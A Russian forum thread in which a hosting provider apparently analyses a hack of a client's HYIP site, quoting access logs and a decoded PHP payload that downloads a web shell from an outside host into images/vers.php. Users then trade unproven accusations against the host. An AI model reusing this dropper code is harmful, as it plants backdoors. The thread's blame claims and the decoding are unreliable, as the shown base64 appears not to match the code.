MMGP logo
Присоединяйтесь к нашему инвестиционному форуму, на котором уже 642,307 пользователей. Чтобы получить доступ ко многим закрытым разделам и начать общение - зарегистрируйтесь прямо сейчас.
Покупка/продажа/обмен хостинга (virtual hosting, dedicated и colocation сервера)
Первый пост Опции темы
Старый 15.02.2013, 15:08
#1
Интересующийся
 
Пол: Мужской
Инвестирую в: Другое
Регистрация: 14.02.2013
Сообщений: 6
Благодарностей: 30
История одной уязвимости

[22:17:19] ***: кто-то залел и поменял файл. Было это 9 числа
[22:17:30] ***: сторонний человек сделать этого не мог
[22:19:24] ***: как этов возможно что у вас по хостингу кто-то ходит ?

Вечер переставал быть томным. Кристально ясно, что никто нигде «ходить» не может, но на лицо нарушение режима безопасности отдельно взятого домена и возможно аккаунта.
Клиент немедленно передается комманде безопасности, допрос с пристрастием приподнимает завесу тайны:

[22:23:48] ***: Как могут ходить по аккаунту ? Вы что издеваетесь ?
[22:23:58] ***: Файл был изменен не с моей стороны
[22:24:07] ***: добавлена строчка на левый редирект в файле
[22:25:32] ddos-guard: используя уязвимость в коде, или стронний шел, могут ходить и изменять данные в вашем аккаунте
[22:31:06] ***: о чем вы вобще говорите ? Файл редиректа был изменен 09.02.2013 в 13:36 и в него была добавлена левая строчка которая при определенных условиях подменивала кошелек. Это что за фигня такая
[22:37:05] ddos-guard: какой файл был изменен?
[22:37:41] ***: deposit.libertyreserve.confirm.tpl
[23:01:15] ddos-guard: расскажите, вот это что это?
https://***.**/images/vers.php
[23:03:25] ***: кстати да, это тоже что ?

Клиент искренне недоумевает как мог изменится файл, при ограничении доступа к FTP по IP. Ситуация достаточно очевидная и в этих ваших интернетах не редкая — на сайте шел. Некто каким-то образом загрузил шел-бекдор в каталог images и вставил хитроумный редирект в шаблон платежной страницы. Казалось бы, не дело хостинга разбираться в личных отношениях клиента и разработчика скрипта, клиента и его дизайнера, клиента и любых других третьих лиц.
В нашем случае как раз дело хостинга. Причина простая — взлом не менее вредоносен для клиента чем DDoS-атака, а значит защита от атак бессмысленна без 100% гарантий безопасности. Именно поэтому мы не используем сторонние панели, именно поэтому все возможности вторжения надежно исключены и проверены не один раз. К сожалению, гарантию от дыр в скриптах не даст даже Госстрах.

[23:20:32] ddos-guard: итак
[23:20:38] ***: да
[23:20:40] ddos-guard: взломщик орудовал с адреса 46.238.35.171
[23:20:45] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:10:05 +0400] "GET /fonts/vers.php HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
[23:20:58] ddos-guard: в 15:10 он проверил не осталось ли fonts.php
[23:21:02] ddos-guard: 404 - не осталось
[23:21:09] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:14:44 +0400] "GET /index.php HTTP/1.0" 200 4275 "-" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:21:12] ddos-guard: потыкался по сайту
[23:21:22] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:18:06 +0400] "POST /admin.php HTTP/1.0" 200 155 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
46.238.35.171 - - [09/Feb/2013:15:19:35 +0400] "POST /admin.php HTTP/1.0" 200 113733 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:21:33] ddos-guard: сделал два POST-запроса, судя по всему к админке
[23:21:52] ddos-guard: второй запрос имел тело с размеров в точности равным images/vers.php
[23:21:58] ddos-guard: 113733 байт
[23:22:22] ddos-guard: 6.238.35.171 - - [09/Feb/2013:15:20:21 +0400] "GET /images/ HTTP/1.1" 403 372 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
46.238.35.171 - - [09/Feb/2013:15:20:25 +0400] "GET /images/123.php HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
46.238.35.171 - - [09/Feb/2013:15:21:02 +0400] "POST /admin.php HTTP/1.0" 200 150 "" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
[23:22:45] ddos-guard: зачем-то проверил images/123.php, не нашел его, еще раз запросил admin.php
[23:23:02] ddos-guard: и следующим запросом открыл image/vers.php
[23:23:03] ddos-guard: 46.238.35.171 - - [09/Feb/2013:15:21:11 +0400] "GET /images/vers.php HTTP/1.1" 200 5070 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"


На голый, чистый красивый и лицензионный Gold Coders залит шел. POST-запрос к admin.php привел к выполнению произвольного кода в контексте скрипта клиента. На этом можно было бы и закончить, но остается незакрытым вопрос что именно является триггером уязвимости. Сам admin.php конечно же зашифрован (в целях безопасности, не иначе). К счастью все ходы записаны, даже для запросов недельной давности. Смотрим тело POST-запроса к admin.php:

------------------------------5dc66f5a13d8
Content-Disposition: form-data; name=\x22bbbp\x22\x0D\x0A\x0D\x0AZWNobyAiPHByZT4iO 2VjaG8gMTExMTE7ZWNobyAiPC9wcmU+IjtleGl0Ow==
------------5dc66f5a13d8--

base64? Очень похоже.
Скрипт увидит примерно следующее:
$name = ‘“bbbp”

echo "<pre>";$a=file_get_contents("https://stern-capital.com/uploads/rtsa");
$fp = fopen ("images/vers.php", "w+");
fwrite ($fp, $a);
fclose ($fp);
echo "</pre>"’;

Ай-ай, admin.php взял да и сделал eval() на данных, полученных из сети.
Дальше всё просто, выполненный eval-ом код скачал шел с сайта взломщика, а чтобы воспользоваться шелом, хакером можно уже и не быть.

Невозможно с уверенностью сказать, почему в admin.php выполняется произвольный код — бекдор от разработчиков, недостаточная проверка входных параметров или какая-то досадная оплошность. Скрипт зашифрован и вполне вероятно, что достоверно о причинах такого поведения мы не узнаем никогда.

Какие выводы можно сделать из этого инцидента:

Для пользователей Gold Coders
Не пользуйтесь этим скриптом! Если вы всё еще хотите попробовать — не пользуйтесь этим скриптом. Из зрительного зала подсказывают - «так ведь других нет», хочется ответить по классику — лучше никакими не пользуйтесь.
Если, не смотря на всё вышеизложенное, вы всё еще очень хотите Gold Coders — закройте в .htaccess доступ к админке, оставив разрешения только для своего статического IP.

Разработчикам Gold Coders
Бекдоры — это не хорошо, ситуация как минимум требует публичного пояснения.
Портируйте уже наконец ваше творение хотя бы на php 5.3 — на улице 2013 год, скрипт исполняемый в среде php 5.2 не может быть безопасен by definition.

Последний раз редактировалось ddos-guard; 16.02.2013 в 11:40.
ddos-guard вне форума
Сказали спасибо 21 раз(а):
AragornEllessar (14.04.2013), BJIaguMuP (22.03.2013), bronko (30.03.2013), expert-money (02.03.2013), Funy-Maker (03.03.2013), k0shel (02.03.2013), Kabelshik (20.03.2013), kodyaich (02.03.2013), lbom (01.03.2013), Petro Fedchyshyn (28.03.2013), relaxman95 (20.03.2013), sergres (25.03.2013), slice (01.03.2013), VladRiga (02.03.2013), Volk111 (02.03.2013), webog (16.04.2013), Wolfcron (19.03.2013), Y A (03.04.2013), Виталий79 (07.03.2013), Спанч Боб (15.02.2013), Творец (02.03.2013)
Старый 15.02.2013, 17:24
#2
Мастер
 
Пол: Мужской
Адрес: Поволжье
Инвестирую в: Свой бизнес
Регистрация: 29.08.2007
Сообщений: 2,301
Благодарностей: 420

награды Ветеран MMGP.RU Волшебный горшочек 
Re: История одной уязвимости

Спасибо вам за потраченное время и найденную уязвимость!
Спанч Боб вне форума
Сказали спасибо 4 раз(а):
AragornEllessar (14.04.2013), Crowds (12.03.2013), lbom (01.03.2013), Ярослав Яценко (01.03.2013)
Старый 02.03.2013, 10:31
#3
Топ Мастер
 
Имя: Сергей
Пол: Мужской
Адрес: Дикий Запад. Сибири)
Инвестирую в: HYIP
Регистрация: 08.07.2011
Сообщений: 24,604
Благодарностей: 11,280
Re: История одной уязвимости

ответ ГК на просьбу прокомментировать ситуёвину...
Цитата:
Я проверил скрипт, $ имя параметра используется после аутентификации администратора только после многих других условий, и этот параметр включен в таблицу MySQL без Eval () функцию. Сценарий не используйте Eval функции.
Я уверен, что сайт был размещен на их DDoS защитой виртуального хостинга, но vitrual хостингах, чтобы другие пользователи сервера чтение / изменение файлов других клиентов
кто-нить может объяснить понятней, для чайника?
__________________
Нельзя дать всем всё, ибо всех - много, а всего - мало! (место под рекламу)
kodyaich вне форума
Старый 02.03.2013, 10:49
#4
Мониторинг
 
Имя: Makc
Пол: Мужской
Возраст: 40
Инвестирую в: HYIP
Регистрация: 14.07.2010
Сообщений: 63,195
Благодарностей: 6,247

награды Ветеран MMGP.RU 
Re: История одной уязвимости

Цитата:
Сообщение от kodyaich Посмотреть сообщение
ответ ГК на просьбу прокомментировать ситуёвину...кто-нить может объяснить понятней, для чайника?
типа у всех есть доступ на чтение/изменения, как я понимаю это можно отключить по фтп, тогда и вам не будет доступа к этому файлу
а легче спрятать этот файл admin.php тогда хакер и запрос на него не сделает не зная где он
__________________
Mega-Hyip вне форума
Сказали спасибо 3 раз(а):
kodyaich (02.03.2013), sergres (25.03.2013), Виталий79 (07.03.2013)
Старый 02.03.2013, 10:55
#5
Топ Мастер
 
Имя: Сергей
Пол: Мужской
Адрес: Дикий Запад. Сибири)
Инвестирую в: HYIP
Регистрация: 08.07.2011
Сообщений: 24,604
Благодарностей: 11,280
Re: История одной уязвимости

Цитата:
Сообщение от Mega-Hyip Посмотреть сообщение
у всех есть доступ на чтение/изменения
ГК ж вроде рекомендуют при установке скрипта изменить доступ к папкам на "только для чтения"...
__________________
Нельзя дать всем всё, ибо всех - много, а всего - мало! (место под рекламу)
kodyaich вне форума
Сказали спасибо:
Mega-Hyip (02.03.2013)
Старый 02.03.2013, 11:07
#6
Мониторинг
 
Имя: Makc
Пол: Мужской
Возраст: 40
Инвестирую в: HYIP
Регистрация: 14.07.2010
Сообщений: 63,195
Благодарностей: 6,247

награды Ветеран MMGP.RU 
Re: История одной уязвимости

Цитата:
Сообщение от kodyaich Посмотреть сообщение
ГК ж вроде рекомендуют при установке скрипта изменить доступ к папкам на "только для чтения"...
ну сами знаете кто-то прислушался а кто-то нет, пока питух не загнет в одно место
а я вообще как говорил в одной из тем рекомендую скрывать файл admin.php и не будет проблем
__________________
Mega-Hyip вне форума
Сказали спасибо:
kodyaich (02.03.2013)
Старый 02.03.2013, 12:03
#7
Топ Мастер
 
Имя: HyipHunter
Пол: Мужской
Регистрация: 03.01.2011
Сообщений: 19,545
Благодарностей: 9,375
Re: История одной уязвимости

Цитата:
Сообщение от kodyaich Посмотреть сообщение
кто-нить может объяснить понятней, для чайника?
сам ГК, только на русском... как я понял, говорят шо юзеру надо было брать дедик,
а на хостинге есть возможность получить доступ к файлам другого юзера, и отредактировать их "как надо"...
ты бы исходник выложил, на английском...

Последний раз редактировалось allegroman; 02.03.2013 в 12:11.
allegroman вне форума
Сказали спасибо:
kodyaich (02.03.2013)
Старый 02.03.2013, 13:03
#8
Топ Мастер
 
Имя: Сергей
Пол: Мужской
Адрес: Дикий Запад. Сибири)
Инвестирую в: HYIP
Регистрация: 08.07.2011
Сообщений: 24,604
Благодарностей: 11,280
Re: История одной уязвимости

Цитата:
Сообщение от allegroman Посмотреть сообщение
ты бы исходник выложил, на английском...
I checked script, $name parameter is used AFTER admin autentification only, after many of other conditions, and this param inserted in mysql table without any eval() function. Script do not use eval function.
I'm sure that website was hosted on their ddos protected virtual hosting, but vitrual hostings allow other users of server read/change files of other clients.
__________________
Нельзя дать всем всё, ибо всех - много, а всего - мало! (место под рекламу)
kodyaich вне форума
Сказали спасибо 2 раз(а):
allegroman (02.03.2013), WorldOfHYIP (02.03.2013)
Старый 02.03.2013, 16:35
#9
Заблокированный
 
Имя: Борис
Пол: Мужской
Инвестирую в: HYIP
Регистрация: 19.09.2012
Сообщений: 2,511
Благодарностей: 845
Re: История одной уязвимости

Цитата:
Сообщение от Mega-Hyip Посмотреть сообщение
а легче спрятать этот файл admin.php тогда хакер и запрос на него не сделает не зная где он
Найдет методом перебора директорий. Вопрос времени.

добавлено через 6 минут
Цитата:
Сообщение от kodyaich Посмотреть сообщение
ответ ГК на просьбу прокомментировать ситуёвину...кто-нить может объяснить понятней, для чайника?
Все просто, если верить этому ответу, то скрипт GC не использует eval() функцию в своем коде и это сводит на нет вышеупомянутое расследование.

А причина действительно могла быть в том, что на этом же сервере у другого пользователя был скомпрометирован аккаунт и с этого взлом и начался, ведь неизвестно, сколько было пострадавших в результате данного инцидента. Я могу подтвердить что такое возможно, был случай очень давно на хостинге BlackLotus’а.

Последний раз редактировалось WorldOfHYIP; 02.03.2013 в 16:41. Причина: Добавлено сообщение
WorldOfHYIP вне форума
Сказали спасибо:
kodyaich (19.03.2013)
Старый 02.03.2013, 17:30
#10
Мониторинг
 
Имя: Makc
Пол: Мужской
Возраст: 40
Инвестирую в: HYIP
Регистрация: 14.07.2010
Сообщений: 63,195
Благодарностей: 6,247

награды Ветеран MMGP.RU 
Re: История одной уязвимости

Цитата:
Сообщение от WorldOfHYIP Посмотреть сообщение
Найдет методом перебора директорий. Вопрос времени.
узнавал давно что если имя сделать из 20 символов то придется очень дооооолго искать а если поставить вообще 80-90 то пусть ищет до старости
__________________
Mega-Hyip вне форума
Старый 02.03.2013, 17:48
#11
Заблокированный
 
Имя: Борис
Пол: Мужской
Инвестирую в: HYIP
Регистрация: 19.09.2012
Сообщений: 2,511
Благодарностей: 845
Re: История одной уязвимости

Цитата:
Сообщение от Mega-Hyip Посмотреть сообщение
узнавал давно что если имя сделать из 20 символов то придется очень дооооолго искать а если поставить вообще 80-90 то пусть ищет до старости
Возможно, только в большинстве случаев скрипт зашифрован и нет возможности что-то менять. Да, и вы недооцениваете возможности облачных технологий. Раньше некоторые хэши паролей считали, что будут ломать до старости.
WorldOfHYIP вне форума
Сказали спасибо:
Funy-Maker (03.03.2013)
Старый 03.03.2013, 04:43
#12
Топ Мастер
 
Имя: Никита
Пол: Мужской
Регистрация: 26.01.2013
Сообщений: 5,515
Благодарностей: 4,377
Re: История одной уязвимости

Цитата:
Сообщение от WorldOfHYIP Посмотреть сообщение
Да, и вы недооцениваете возможности облачных технологий.
Да,Технологии двигаются огромными рывками.
__________________
Открыл счет в Tickmill.Торгую на рубле
Funy-Maker вне форума
Старый 19.03.2013, 19:49
#13
Заблокированный
 
Имя: Вульф
Пол: Мужской
Возраст: 37
Адрес: London
Инвестирую в: HYIP
Регистрация: 25.02.2013
Сообщений: 2,123
Благодарностей: 1,862
Re: История одной уязвимости

Случилась такая интересная ситуация...Я активно наблюдал за взломом последних проектов, являющихся клиентами DDoS Guard. Пару дней назад несколько знакомых стали утверждать, что взлом происходит со стороны именно DDoS Guard. Я очень сомневался в этом, так как известны частые случаи подобных взломов на других хостингах. Но вот в чем проблема, на других хостингах (на всех без исключения), атаки производятся методом DoS или SQL. Но только у хостинг-провайдера DDoS Guard каким то странным и необычным способом происходит подключение к FTP серверу. Тут я поднял пару своих старых учебников и стал искать, как можно взломать FTP. В итоге получил на всё один ответ - никак, кроме прямого взлома сервера или подборкой паролей (Bruteforce). Как нам ясно, ни тот ни этот метод не подходят нам в данном случае. Просто ради интереса и пояснения сложившейся ситуации я решил переговорить со "специалистом" DDoS Guard. Итак :

Переписка.
[17:49:51] Wolfcron: Добрый день. В последние дни произошло порядка 10 взломов на вашем хостинге. Пошли слухи от десятков админов HYIP проектов, что взлом был осуществлен путем вшивания шелл файлов. С шеллами понятно - уязвимость *htacess. Вот интересует другое, как могли взломать пароль к фтп? Шелл не способен ведь вытащить пароль к фтп. Интересует информация, так как в настоящее время имя вашей компании под ударом и рассылается новость, что именно вы и воруете деньги.
[17:50:30] ddos-guard: рассылается кем и куда?
[17:50:55] Wolfcron: Это конфиденциальная информация.
[17:51:06] ddos-guard: Мы даже не храним данные для доступа.
[17:52:18] Wolfcron: В таком случае интересно, как ломается и получают доступ к фтп. Доступ к фтп взломать реально только при прямом взломе сервера
[17:53:45] Wolfcron: Думаю легко понятно, что пароль типа 12345 можно взломать минут за 15, а пароль GhTWUu&@*93 лет 50 потребуется. Насколь мне известно, вы используете пароли со спецсимволами.
[17:54:45] ddos-guard: мы используем длинные пароли с хорошей стойкостью от перебора, мы отслеживаем доступы к FTP и биллингу
[17:55:13] Wolfcron: В таком случае как на вашем "высокозащищенном" сервере происходит взлом паролей?
[17:56:01] ddos-guard: пока есть основания предполагать, что пароли вытаскиваются с почты клиента или напрямую с его компьютера
[17:56:33 | Изменены 17:56:40] Wolfcron: То есть вы хотите сказать что порядка 5 админов взломали через их компьютер?
[17:56:39] ddos-guard: ddos-guard отправил контактные данные Wolfcron.
[17:57:07] ddos-guard: или через почту
[17:57:37] Wolfcron: А вам не кажется странным, что несколько админов взломали через "почту" ?
[17:58:11] Wolfcron: Больше это похоже на гон и есть серьезные основания полагать что ddos guard причастны ко взломам и уводу денег средств
[17:58:43 | Изменены 17:58:49] Wolfcron: Везде одно и то же : Instant - шелл - взлом фтп - DDoS Guard
[17:59:41] ddos-guard: о каких основаниях вы говорите?
[18:01:18] Wolfcron: Об обычных. рассмотрим слудующую ситуацию. К примеру возьмем проект N. Хостился на Block DoS. был произведен взлом - НО - ДОСТУПА К ФТП НЕ БЫЛО У ХАКЕРОВ. Потом данный проект перекинули на ваш хостинг, сменили пароли, обновили защиту - И чудным образом произошел взлом - на этот раз уже через прямой доступ к фтп.
[18:01:27] Wolfcron: Буквально в течении 2-3 часов после переноса
[18:01:55] ddos-guard: т.е. проект ломают везде, а вы говорите что виноват хостинг, я правильно понимаю?
[18:02:05] ddos-guard: так о каких основаниях вы говорили?
[18:02:14] ddos-guard: пока я вижу домыслы
[18:02:34] Wolfcron: Проекты ломают НЕ ВЕЗДЕ. Суть в следующем : Только у вас на хостинге получают прямой доступ к фтп.
[18:02:48 | Изменены 18:03:21] Wolfcron: В других проектах взломов на 90% меньше на других хостингах
[18:02:56] Wolfcron: И тип атак DoS или SQL
[18:03:58] ddos-guard: очевидно у нас эти атаки не работают, приходится изобретать более сложные пути
[18:05:21] Wolfcron: Как показало наблюдение - взлом фтп не такой уж и более сложный путь, если взлом произошел у знакомого через 3 часа после переноса БД и файлов на ваш сервер.
[18:07:17] Wolfcron: В таком случае раз вы предполагает что возможен взлом через почту, объясните следующий момент :
Почта связана с телефоном, чтобы войти в неё необходимо получить пароль в смс сообщении, неужто телефон и смс тоже взломали?
[18:07:56] ddos-guard: доступ к ftp элементарно блокируется в .ftpaccess
[18:08:10] Wolfcron: Понимаю. Как взломали тогда?
[18:11:23] ddos-guard: если вы предполагаете утечку пароля, доступ всегда можно закрыть по IP в .ftpaccess
[18:29:53] Wolfcron: https://mmgp.ru/showpost.php?p=4035264&postcount=1
[18:30:00] Wolfcron: Клиент искренне недоумевает как мог изменится файл, при ограничении доступа к FTP по IP.
[18:30:12] Wolfcron: Вы писали что ограничение и доступ были закрыты по IP
[18:30:53] Wolfcron: Для пользователей Gold Coders
Не пользуйтесь этим скриптом!

Взлом идет не только на GC, но и в других скриптах, даже самописных
[18:45:36] Wolfcron: Как это прокомментируете?
[18:49:42] ddos-guard: скажите, что вы от меня хотите услышать?
[18:49:57] ddos-guard: мы не ломаем пользователей и не имеем в этом интереса
[18:51:00] Wolfcron: В таком случае вы подтверждаете факт, что ваш хостинг не способен дать необходимую защиту вашим клиентам
[18:51:15] ddos-guard: ни в коем случае
[18:51:44] Wolfcron: Как объясните факт тогда, что именно у вас сыпятся проекты и угоняются средства?
[19:08:13] Wolfcron: Грубо говоря оперирую фактом. Из-за некомпитентности ваших сотрудников, а также невозможности предоставить необходимую защиту своим клиентам НА ДАННОМ этапе, практически ЕЖЕДНЕВНО теряют астрономические суммы не только админы проектов, но в том числе и тысячи (а может и больше) простых пользователей, по причине взлома проектов. В таком случае о какой защите может идти речь, если вы даже не можете обезопасить сохранность средств ваших клиентов.
[19:13:37] ddos-guard: "некомпитентности" - это какими фактами вы оперируете?
[19:13:44] ddos-guard: словарем русского языка?
[19:14:58] Wolfcron: Отнюдь. Выше я написал - невозможности предоставить защиту. То есть, вы отлично знаете о взломах на вашем хостинге, но ничего не делаете. Тем временем взломы продолжаются, а люди (в том числе и я) теряют свои средства.
[19:15:12] Wolfcron: Или вы хотите сказать, что надо вас поблагодарить?
[19:15:23] ddos-guard: скажите, вы наш клиент?
[19:15:32 | Изменены 19:15:49] Wolfcron: Слава Богу, что нет
[19:17:13] ddos-guard: и не планируете им стать?
[19:17:50] Wolfcron: И не планирую им стать, пока Вы не наладите работу не сделаете все возможное для защиты ваших же клиентов.
[19:18:12] ddos-guard: отлично. Тогда не тратьте моё время пустыми домыслами
[19:18:52] Wolfcron: С чего вы взяли что это пустые домыслы? Вы не ответили ни на 1 вопрос и не дали ни 1 должного разъяснения сложившейся ситуации.


Итак получаем следующее : Ни на 1 интересующий меня вопрос так и не получено ни одного адекватного или более-менее разъясняющего момент/ситуацию ответа.
На каждый вопрос - отговорки. На каждый второй вопрос - молчание. Какой вывод?

Вывод следующий : Пока DDoS Guard не разъяснит ситуацию или хотя бы не попытается какими-либо методами обезопасить своих клиентов - ВЕРИТЬ ИМ НЕЛЬЗЯ!

Последний раз редактировалось Wolfcron; 20.03.2013 в 12:54.
Wolfcron вне форума
Сказали спасибо 57 раз(а):
Assambley (19.03.2013), astro log (27.03.2013), Azgard (21.03.2013), BJIaguMuP (22.03.2013), BJIaguMuP48 (19.03.2013), bronko (03.04.2013), chuprik (21.03.2013), cotzp (21.03.2013), DAZO (31.03.2013), Dimass-91 (31.03.2013), Dmitry Maltsev (23.03.2013), efsm (19.03.2013), Elena82 (20.03.2013), evro79 (19.03.2013), Gilan (19.03.2013), Girsan (29.03.2013), grandzero (31.03.2013), heezay (31.03.2013), Igor2 (31.03.2013), Janis21 (26.03.2013), jero01 (30.03.2013), k0shel (10.10.2013), kodyaich (19.03.2013), konan1985 (31.03.2013), KupeC1985 (24.03.2013), lanass (20.03.2013), MoscowMany (19.03.2013), nachalo (19.03.2013), nikivoron (21.03.2013), Pankrat (19.03.2013), Panther (05.04.2013), Petro Fedchyshyn (28.03.2013), player-9 (21.03.2013), ramtur (19.03.2013), sergeyragulin (20.03.2013), shtorm3000 (21.03.2013), SiskiW (20.03.2013), Skiv (28.03.2013), slawabest (24.03.2013), slevin32 (21.03.2013), Sokald (19.03.2013), ssvystun (20.03.2013), Stanislav Philippov (20.03.2013), StellaSV (21.03.2013), Taus (23.03.2013), Thunderlight (20.03.2013), var4un85 (19.03.2013), Volk111 (19.03.2013), Watcher12 (24.03.2013), WEB-INVEST (19.03.2013), webog (16.04.2013), Бир Манат (20.03.2013), Виталий79 (20.03.2013), Даниель (26.03.2013), Денис Ричмонд (19.03.2013), Неприятель (31.03.2013), Станислав1982 (23.03.2013)
Старый 19.03.2013, 20:12
#14
Интересующийся
 
Пол: Мужской
Инвестирую в: Другое
Регистрация: 18.03.2013
Сообщений: 2
Благодарностей: 13
Re: История одной уязвимости

Сегодня таким способом взломали и меня,на ftp были залиты файлы lrb_136206845,а также перезалит settings.php,пароли к ftp сразу удалил с нового емейла!Как эти файлы попали на сервер под вопросом...
General-I вне форума
Старый 19.03.2013, 20:27
#15
Мастер
 
Имя: Артём
Пол: Мужской
Адрес: Москва
Инвестирую в: HYIP
Регистрация: 28.07.2012
Сообщений: 3,789
Благодарностей: 5,489
Re: История одной уязвимости

General-I, я так понимаю вы админ генерала? Выложите переписку с гуардом.
__________________
W-SHOP.CC ЛУЧШЕЕ РЕШЕНИЕ ДЛЯ ВЛАДЕЛЬЦЕВ САЙТА

Green Bar EV SSL Certificate - Зелёная адресная строка
MoscowMany вне форума
Сказали спасибо 2 раз(а):
slawabest (24.03.2013), Wolfcron (19.03.2013)
Старый 19.03.2013, 20:37
#16
Топ Мастер
 
Имя: Денис
Пол: Мужской
Адрес: скайп richmondbest
Инвестирую в: Другое
Регистрация: 20.06.2012
Сообщений: 11,110
Благодарностей: 12,013

награды Спонсор 
Re: История одной уязвимости

Общение с клиентами замечательное)))
Мало денег видимо..хотят еще с вкладчиков по иметь!
Заметьте с вкладчиков. Это не админа деньги тАм!!!
__________________
В хайпах вытащил все что мог, больше смысла тут находиться не вижу.
Ушел в более серьезные вещи.
Кому надо пишите ВКОНТАКТЕ
Денис Ричмонд вне форума
Сказали спасибо 10 раз(а):
dvdosh (19.03.2013), Gilan (19.03.2013), MoscowMany (19.03.2013), Nata Kras (19.03.2013), Petro Fedchyshyn (28.03.2013), slawabest (24.03.2013), slice (19.03.2013), Wolfcron (19.03.2013), Виталий79 (20.03.2013), Сифа (24.03.2013)
Старый 19.03.2013, 20:43
#17
Топ Мастер
 
Имя: Nata
Пол: Женский
Возраст: 35
Инвестирую в: HYIP
Регистрация: 02.06.2012
Сообщений: 13,980
Благодарностей: 16,866
Re: История одной уязвимости

Цитата:
Сообщение от MoscowMany Посмотреть сообщение
General-I, я так понимаю вы админ генерала? Выложите переписку с гуардом.
не, ну что за модераторы, забанили уже генерала
Цитата:
Дата блокировки: 19.03.2013 / Заблокирован до: 29.03.2013
Причина: набивка постов
Кто заблокировал: LSasha
__________________
Royal Investments - лучшие проекты / Каждый hyip я проверяю здесь
Nata Kras вне форума
Сказали спасибо 3 раз(а):
MoscowMany (19.03.2013), slice (19.03.2013), Wolfcron (19.03.2013)
Старый 19.03.2013, 20:46
#18
Мастер
 
Имя: Артём
Пол: Мужской
Адрес: Москва
Инвестирую в: HYIP
Регистрация: 28.07.2012
Сообщений: 3,789
Благодарностей: 5,489
Re: История одной уязвимости

сегодня будет не сколько логов от разных проектов и админов.
где взлом происходил через ftp и у каждого админа были разные скрипты.
А пароли только у doss guard которые пытаются навязать инвесторам и админам, что они не причем.
Вчера вкинул в проект 500 баксов, а сегодня мне сообщили что doss guard пытается их хакнуть и забрать деньги инвесторов из этого проекта.
Благо все обошлось...Почему я должен терять вложенные деньги? С инвесторами простыми они в скайпе не общаяются
__________________
W-SHOP.CC ЛУЧШЕЕ РЕШЕНИЕ ДЛЯ ВЛАДЕЛЬЦЕВ САЙТА

Green Bar EV SSL Certificate - Зелёная адресная строка

Последний раз редактировалось MoscowMany; 19.03.2013 в 20:48.
MoscowMany вне форума
Сказали спасибо 7 раз(а):
David Webb (19.03.2013), Gilan (19.03.2013), Nata Kras (19.03.2013), slawabest (24.03.2013), Wolfcron (19.03.2013), Виталий79 (20.03.2013), Денис Ричмонд (19.03.2013)
Старый 19.03.2013, 20:47
#19
Заблокированный
 
Имя: Вульф
Пол: Мужской
Возраст: 37
Адрес: London
Инвестирую в: HYIP
Регистрация: 25.02.2013
Сообщений: 2,123
Благодарностей: 1,862
Re: История одной уязвимости

Цитата:
Сообщение от Денис Ричмонд Посмотреть сообщение
Общение с клиентами замечательное)))
Я не клиент если даже, я потерял по ихней вине часть своих средств как и другие пользователи. Мне что теперь, сидеть молчать? Факт остается фактом - пока не пояснят ситуацию публично - пока что нет доверия словам специалистов.
Wolfcron вне форума
Сказали спасибо:
MoscowMany (19.03.2013)
Старый 19.03.2013, 20:51
#20
Топ Мастер
 
Пол: Мужской
Адрес: Ukraine-Dnepropetrovsk.
Инвестирую в: HYIP
Регистрация: 14.09.2010
Сообщений: 9,184
Благодарностей: 4,706
Re: История одной уязвимости

Надо ещё Вовку позвать.У него такая же ситуация была.
ddos-guard ,чего подглядываете и молчите?
Gilan вне форума
Сказали спасибо 2 раз(а):
MoscowMany (19.03.2013), Wolfcron (19.03.2013)
Войдите, чтобы оставить комментарий.
Быстрый переход
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
TeleTRADE. Мошенники из КРОУФР или история одной претензии. Kreol Претензии к компании Телетрейд 84 02.09.2015 22:47
Индивидуальное занятие по теме "SEO-уязвимости. Как не навредить продвижению сайта?" Владимир999 Сайт & Серверное администрирование 1 14.11.2011 23:49
уязвимости скрипта в интернет казино jensha Другая работа/сервис 7 15.12.2008 22:26